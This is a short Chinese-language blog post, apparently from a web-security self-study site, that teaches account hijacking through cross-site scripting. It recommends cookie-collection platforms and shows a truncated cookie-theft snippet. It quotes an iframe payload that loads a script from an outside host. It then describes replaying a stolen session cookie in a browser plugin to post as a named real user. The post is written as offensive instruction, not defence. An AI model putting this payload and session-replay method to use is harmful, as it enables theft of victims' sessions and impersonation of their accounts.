其实xss大家搜搜下就知道怎么利用了。。但是劫持账户上。大家可能觉得有两个难点..我在这里教大家。。 1.如果收到被害者的cookie. 其实可以在自己网站上做一个脚本来进行cookie收集。。。也可以用第三方的cookie收集平台。。 比如或者xss.la等。这两个平台都是禁止注册的。。自己写一个就好.很简单 熟悉javascript,简单看下别人偷cookie的代码。。就明白是怎么回事了 var x=new Image(); 上面是我的xss javascript代码。。。 再发个别人的一个利用方式: 1 <iframe onload=”this.src=’xss 地址+<script src =tmxk.Org/0.js>'” style=”display:none”></iframe> 2.获得cookie之后,如何使用? 其实firefox和chrome都有插件可以完成这个功能。直接替换上@铂金小猪 的oscid就可以用他的账号说话了。。 我用的是firefox的web developer toolbar: |
-
上一篇: 也买酒篡改总订单金额便宜买拉菲拉 – 网站安全
下一篇: Java反射执行系统命令 – 网站安全 – 自学php
评论前必须登录!
立即登录